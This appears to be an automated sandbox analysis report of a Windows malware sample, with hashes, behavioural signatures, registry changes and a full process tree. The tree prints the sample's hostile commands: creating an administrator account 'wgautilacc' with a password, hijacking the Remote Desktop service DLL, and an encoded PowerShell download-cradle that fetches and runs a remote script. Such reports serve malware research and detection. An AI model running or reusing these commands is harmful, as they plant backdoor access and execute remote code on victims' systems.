Analysis
-
max time kernel
58s -
max time network
100s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
11-06-2021 14:59
Static task
static1
Behavioral task
behavioral1
Sample
20f307c716a689f4afa3a76b7143db22.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
20f307c716a689f4afa3a76b7143db22.exe
Resource
win10v20210408
General
-
Target
20f307c716a689f4afa3a76b7143db22.exe
-
Size
6.0MB
-
MD5
20f307c716a689f4afa3a76b7143db22
-
SHA1
2fd6796fd158c93b14654240533511af6fec03e5
-
SHA256
3647e2dc4336b2eeb828371821c706a329dce645cb16f9c1c31c3faeae8f56dd
-
SHA512
0a8d1b2d0cbd3860df907eb692aa2d775f021822b4d856c051d84e8056a2c1cf893bab68f471b69db0615341dd2dfe78dfac1b79d2239217cfbdf71bfb84061b
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 15 212 powershell.exe 17 212 powershell.exe 18 212 powershell.exe 19 212 powershell.exe 21 212 powershell.exe 23 212 powershell.exe 25 212 powershell.exe 27 212 powershell.exe 29 212 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 4012 4012 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_wgyjbpvf.l0f.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID317.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID328.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID269.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID2F6.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID327.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_jag502fc.aqf.psm1 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 6ead5207ab2cd701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 17 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 18 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 19 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3028 powershell.exe 3028 powershell.exe 3028 powershell.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1264 powershell.exe 1264 powershell.exe 1264 powershell.exe 2160 powershell.exe 2160 powershell.exe 2160 powershell.exe 3028 powershell.exe 3028 powershell.exe 3028 powershell.exe 212 powershell.exe 212 powershell.exe 212 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 636 636 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3028 powershell.exe Token: SeDebugPrivilege 1588 powershell.exe Token: SeIncreaseQuotaPrivilege 1588 powershell.exe Token: SeSecurityPrivilege 1588 powershell.exe Token: SeTakeOwnershipPrivilege 1588 powershell.exe Token: SeLoadDriverPrivilege 1588 powershell.exe Token: SeSystemProfilePrivilege 1588 powershell.exe Token: SeSystemtimePrivilege 1588 powershell.exe Token: SeProfSingleProcessPrivilege 1588 powershell.exe Token: SeIncBasePriorityPrivilege 1588 powershell.exe Token: SeCreatePagefilePrivilege 1588 powershell.exe Token: SeBackupPrivilege 1588 powershell.exe Token: SeRestorePrivilege 1588 powershell.exe Token: SeShutdownPrivilege 1588 powershell.exe Token: SeDebugPrivilege 1588 powershell.exe Token: SeSystemEnvironmentPrivilege 1588 powershell.exe Token: SeRemoteShutdownPrivilege 1588 powershell.exe Token: SeUndockPrivilege 1588 powershell.exe Token: SeManageVolumePrivilege 1588 powershell.exe Token: 33 1588 powershell.exe Token: 34 1588 powershell.exe Token: 35 1588 powershell.exe Token: 36 1588 powershell.exe Token: SeDebugPrivilege 1264 powershell.exe Token: SeIncreaseQuotaPrivilege 1264 powershell.exe Token: SeSecurityPrivilege 1264 powershell.exe Token: SeTakeOwnershipPrivilege 1264 powershell.exe Token: SeLoadDriverPrivilege 1264 powershell.exe Token: SeSystemProfilePrivilege 1264 powershell.exe Token: SeSystemtimePrivilege 1264 powershell.exe Token: SeProfSingleProcessPrivilege 1264 powershell.exe Token: SeIncBasePriorityPrivilege 1264 powershell.exe Token: SeCreatePagefilePrivilege 1264 powershell.exe Token: SeBackupPrivilege 1264 powershell.exe Token: SeRestorePrivilege 1264 powershell.exe Token: SeShutdownPrivilege 1264 powershell.exe Token: SeDebugPrivilege 1264 powershell.exe Token: SeSystemEnvironmentPrivilege 1264 powershell.exe Token: SeRemoteShutdownPrivilege 1264 powershell.exe Token: SeUndockPrivilege 1264 powershell.exe Token: SeManageVolumePrivilege 1264 powershell.exe Token: 33 1264 powershell.exe Token: 34 1264 powershell.exe Token: 35 1264 powershell.exe Token: 36 1264 powershell.exe Token: SeDebugPrivilege 2160 powershell.exe Token: SeIncreaseQuotaPrivilege 2160 powershell.exe Token: SeSecurityPrivilege 2160 powershell.exe Token: SeTakeOwnershipPrivilege 2160 powershell.exe Token: SeLoadDriverPrivilege 2160 powershell.exe Token: SeSystemProfilePrivilege 2160 powershell.exe Token: SeSystemtimePrivilege 2160 powershell.exe Token: SeProfSingleProcessPrivilege 2160 powershell.exe Token: SeIncBasePriorityPrivilege 2160 powershell.exe Token: SeCreatePagefilePrivilege 2160 powershell.exe Token: SeBackupPrivilege 2160 powershell.exe Token: SeRestorePrivilege 2160 powershell.exe Token: SeShutdownPrivilege 2160 powershell.exe Token: SeDebugPrivilege 2160 powershell.exe Token: SeSystemEnvironmentPrivilege 2160 powershell.exe Token: SeRemoteShutdownPrivilege 2160 powershell.exe Token: SeUndockPrivilege 2160 powershell.exe Token: SeManageVolumePrivilege 2160 powershell.exe Token: 33 2160 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
20f307c716a689f4afa3a76b7143db22.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 668 wrote to memory of 3028 668 20f307c716a689f4afa3a76b7143db22.exe powershell.exe PID 668 wrote to memory of 3028 668 20f307c716a689f4afa3a76b7143db22.exe powershell.exe PID 3028 wrote to memory of 3744 3028 powershell.exe csc.exe PID 3028 wrote to memory of 3744 3028 powershell.exe csc.exe PID 3744 wrote to memory of 2392 3744 csc.exe cvtres.exe PID 3744 wrote to memory of 2392 3744 csc.exe cvtres.exe PID 3028 wrote to memory of 1588 3028 powershell.exe powershell.exe PID 3028 wrote to memory of 1588 3028 powershell.exe powershell.exe PID 3028 wrote to memory of 1264 3028 powershell.exe powershell.exe PID 3028 wrote to memory of 1264 3028 powershell.exe powershell.exe PID 3028 wrote to memory of 2160 3028 powershell.exe powershell.exe PID 3028 wrote to memory of 2160 3028 powershell.exe powershell.exe PID 3028 wrote to memory of 3724 3028 powershell.exe reg.exe PID 3028 wrote to memory of 3724 3028 powershell.exe reg.exe PID 3028 wrote to memory of 1728 3028 powershell.exe reg.exe PID 3028 wrote to memory of 1728 3028 powershell.exe reg.exe PID 3028 wrote to memory of 2364 3028 powershell.exe reg.exe PID 3028 wrote to memory of 2364 3028 powershell.exe reg.exe PID 3028 wrote to memory of 2228 3028 powershell.exe net.exe PID 3028 wrote to memory of 2228 3028 powershell.exe net.exe PID 2228 wrote to memory of 2236 2228 net.exe net1.exe PID 2228 wrote to memory of 2236 2228 net.exe net1.exe PID 3028 wrote to memory of 3892 3028 powershell.exe cmd.exe PID 3028 wrote to memory of 3892 3028 powershell.exe cmd.exe PID 3892 wrote to memory of 512 3892 cmd.exe cmd.exe PID 3892 wrote to memory of 512 3892 cmd.exe cmd.exe PID 512 wrote to memory of 4020 512 cmd.exe net.exe PID 512 wrote to memory of 4020 512 cmd.exe net.exe PID 4020 wrote to memory of 2360 4020 net.exe net1.exe PID 4020 wrote to memory of 2360 4020 net.exe net1.exe PID 3028 wrote to memory of 2016 3028 powershell.exe cmd.exe PID 3028 wrote to memory of 2016 3028 powershell.exe cmd.exe PID 2016 wrote to memory of 2144 2016 cmd.exe cmd.exe PID 2016 wrote to memory of 2144 2016 cmd.exe cmd.exe PID 2144 wrote to memory of 1276 2144 cmd.exe net.exe PID 2144 wrote to memory of 1276 2144 cmd.exe net.exe PID 1276 wrote to memory of 2232 1276 net.exe net1.exe PID 1276 wrote to memory of 2232 1276 net.exe net1.exe PID 3744 wrote to memory of 3576 3744 cmd.exe net.exe PID 3744 wrote to memory of 3576 3744 cmd.exe net.exe PID 3576 wrote to memory of 1588 3576 net.exe net1.exe PID 3576 wrote to memory of 1588 3576 net.exe net1.exe PID 560 wrote to memory of 2088 560 cmd.exe net.exe PID 560 wrote to memory of 2088 560 cmd.exe net.exe PID 2088 wrote to memory of 2500 2088 net.exe net1.exe PID 2088 wrote to memory of 2500 2088 net.exe net1.exe PID 2792 wrote to memory of 3120 2792 cmd.exe net.exe PID 2792 wrote to memory of 3120 2792 cmd.exe net.exe PID 3120 wrote to memory of 188 3120 net.exe net1.exe PID 3120 wrote to memory of 188 3120 net.exe net1.exe PID 2768 wrote to memory of 4056 2768 cmd.exe net.exe PID 2768 wrote to memory of 4056 2768 cmd.exe net.exe PID 4056 wrote to memory of 3964 4056 net.exe net1.exe PID 4056 wrote to memory of 3964 4056 net.exe net1.exe PID 2308 wrote to memory of 1588 2308 cmd.exe net.exe PID 2308 wrote to memory of 1588 2308 cmd.exe net.exe PID 1588 wrote to memory of 656 1588 net.exe net1.exe PID 1588 wrote to memory of 656 1588 net.exe net1.exe PID 760 wrote to memory of 2504 760 cmd.exe net.exe PID 760 wrote to memory of 2504 760 cmd.exe net.exe PID 2504 wrote to memory of 1608 2504 net.exe net1.exe PID 2504 wrote to memory of 1608 2504 net.exe net1.exe PID 1232 wrote to memory of 2160 1232 cmd.exe WMIC.exe PID 1232 wrote to memory of 2160 1232 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\20f307c716a689f4afa3a76b7143db22.exe"C:\Users\Admin\AppData\Local\Temp\20f307c716a689f4afa3a76b7143db22.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\swcgawoz\swcgawoz.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79D9.tmp" "c:\Users\Admin\AppData\Local\Temp\swcgawoz\CSC2C10604955244B3BB8E4FF5CA2DE646.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc 9gM25Ibj /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc 9gM25Ibj /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 9gM25Ibj /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc 9gM25Ibj1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc 9gM25Ibj2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 9gM25Ibj3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
